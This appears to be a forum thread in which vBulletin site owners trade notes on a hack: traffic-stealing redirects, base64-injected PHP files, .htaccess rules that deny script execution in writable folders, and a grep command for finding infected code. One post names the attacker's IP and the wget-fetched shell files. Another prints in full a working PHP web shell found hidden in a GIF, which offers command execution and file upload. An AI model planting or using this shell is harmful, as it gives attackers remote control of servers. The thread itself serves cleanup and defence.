Security issue

Thanks for all the help. So I got rid of the exploit, got the .htaccess password working and renamed admincp. Next I guess I should update from 3.8.4 pl2 to 3.8.5. Is that even necessary to prevent this exploit or will the steps I've just taken kill it for good?

No one is 100% sure where the exploit is. everything points at folder security.
Make sure all your chmod 777 (writable) directories have:
vBSEO Security Bulletin - vBSEO 3.3.2 Released
in place in an htaccess file
and that you do NOT allow zip or other executable uploads.

Originally Posted by Brian Cummiskey

No one is 100% sure where the exploit is. everything points at folder security.
Make sure all your chmod 777 (writable) directories have:
vBSEO Security Bulletin - vBSEO 3.3.2 Released
in place in an htaccess file
and that you do NOT allow zip or other executable uploads.

I have attachments stored in the DB. Would it be better to move them to the file system and secure it with the .htaccess? Isn't it conceivable that the exploit could be in an attachment stored in the DB?

DB storage is not effected.

But, it's more than just attachments... it's ANY folder that is 777.
check your avatar storage type, any data/uploads/etc from galleries, profile pics, any add ons, etc etc, and any folders outside of vb too.

That said,

I would recommend using the filesystem over DB for performance reasons. The file system is far better at managing, you guessed it, files than a DB is.
The only downfall is backups. Now, your db dump will not contain your attahcments/etc., so you will need to backup your file system as well.

Finally getting some traffic come back. Very slowly, but there is a slight return.
Plus while I have been in the dire troubles, reading one or two of Brians recommendations on forum settings, might speed it up a bit.
Things like taking the fluff out of the sitemap etc
Not a brilliant return, but it is returning.

Thanks to all who jumped in and helped when I found that I had been hacked.
Very much appreciated guys and gals.

Quick update on this. I found a rouge file on my server yesterday called matilde_clovis.php. This was in a VB unrelated folder though and it is full of base64_decode

Looking at VB license rules, you can also change the copyright notice to an image, so you have less chance of being picked up by a casual search for vbulletin copyright
The "power by vbulletin" footer is a trouble maker

even without the footer, its very simple to find vb sites... just search google for strings like "vbulletin_css"

Hello everyone,

After an investigation, due to the infection my vbulletin forums got, I found the source of the problem, at list for my case.

I discovered that someone used shell commands somehow, and wrote the malicious "base64" code in some php files.

The IP of the attacker is 195.78.109.97, he used "Wget" commands to download from his server to mine the malicious code, you can see it here (http://195.78.109.97/shell.txt) or here (http://195.78.109.97/shell2.txt) Kaspersky dont allow me to enter the second because he contains a virus named Backdoor-PHP or something like that.

He used both files to wrote in some of my php files, or to create new php files containing this code, he also chmoded all me website's php and js files.

For my case i used a grep command to find infected files "grep -r 'base64_decode' /path/to/your/web/directory/* > /path/to/logfile.txt"

All the path of the files containing base64_decode will be listed in the logfile, you should then investigate if it is just a normal "base64_decode" code or its the same as "shell.txt" , remove then all the infected code or the file itself, then investigate if there is a 666 chmod for files or 777 for directories that mustn't be, rechmod them for the right one,

Create also in the 777 chmoded directorie a .htaccess containing

<Files ~ "\.(php\d*|cgi|pl|phtml)$">
order allow,deny
deny from all
</Files>

to deny queries from other script.


That all i does, and till now everything is right.

Count me among those that were hit. Definitely on one site and maybe on another. Google result will show homepage of site and redirect to MyFileStore.com.

I looked in global_start and didn't find anything. I've also got Joomla installed with vB. I reinstalled vBSEO and have no idea if I removed the issue.

Oddly enough, it doesn't hit the redirect each time. That being said, I just used a brand new phone today and it redirected, so it was there earlier today.

I too was wondering where all my traffic has been.

These redirects are stored in cookies so it only happens once.

Clear out all yoru cookies for your domain to see if it happens.

Also, make sure you have all your writable files and folders locked down as this thread suggests starts back on page 6 or so as this seems to be how they are getting in.

And once done, change all your passwords, including your server root and db passwords, as they may have gotten all of your login credentials.

where exactly is that global start file located?

Hello,

that is not a file, but vB plugin that can be located in vB admincp->Plugins list (it's actually stored in database).

I just found a gif file with this shell code embedded in it:

Code:

<?php
 ob_end_clean(); ob_start(); $disablefuncs = array(); function myshellexec($cmd) { global $disablefuncs; if (empty($cmd)) { return ''; } $result = ''; if (is_callable('exec') and !in_array('exec', $disablefuncs)) { exec($cmd, $result); $result = join("\n", $result); } elseif (($result = `$cmd`) !== FALSE) { } elseif (is_callable('system') and !in_array('system')) { ob_start(); system($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) { ob_start(); passthru($cmd); $result = ob_get_contents(); ob_clean(); } elseif (is_resource($fp = popen($cmd,"r"))) { while(!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } else { $result = 'Shit. Can\'t execute command - paranoidal admin[s] has been disabled many functions!'; } return $result; } if (is_callable('ini_get')) { $disablefuncs = ini_get("disable_functions"); if (!empty($disablefuncs)) { $disablefuncs = str_replace(' ', '', $disablefuncs); $disablefuncs = explode(',', $disablefuncs); } else { $disablefuncs = array(); } } if (isset($_POST['execl'])) { echo $_POST['execl']. '<br>'; echo myshellexec($_POST['execl']); } if (isset($_POST['pcntl_exec'])) { pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']); } if (isset($_FILES['upfile'])) { if (is_uploaded_file($_FILES['upfile']['tmp_name'])) { move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']); echo '<b>Uploaded!</b>'; } } ?><br>
</pre>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
	/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit">
</form><br>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
	pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit">
</form>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">
	upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit">
</form>
<script>document.getElementById("bash").focus();</script>
</font>
<?php
 $text = str_replace("\n", '<br />', ob_get_contents()); ob_end_clean(); echo $text; ?>

Fun

I removed the image, banned user, and added the .htaccess above to the 777 directories.

I only found one "global_start" and that wasvBSEO Global Start with this code:

"if(defined('VBSEO_ENABLED'))
vbseo_complete_sec('global_start');"

Does that mean I am not infected?

Originally Posted by CThiessen

Hi,
it is vBulletin related but it is not in the files its stored in the database:
You need to go to your AdminCP:
Entra - JustOverclock.com - vBulletin Pannello Admin

and then - Text in Italian or English?:
Attachment 6987

Greetings
Christian

Oops, will check global_ plugins as well. Ill be back in a min.

Originally Posted by GGG

I only found one "global_start" and that wasvBSEO Global Start with this code:

"if(defined('VBSEO_ENABLED'))
vbseo_complete_sec('global_start');"

Does that mean I am not infected?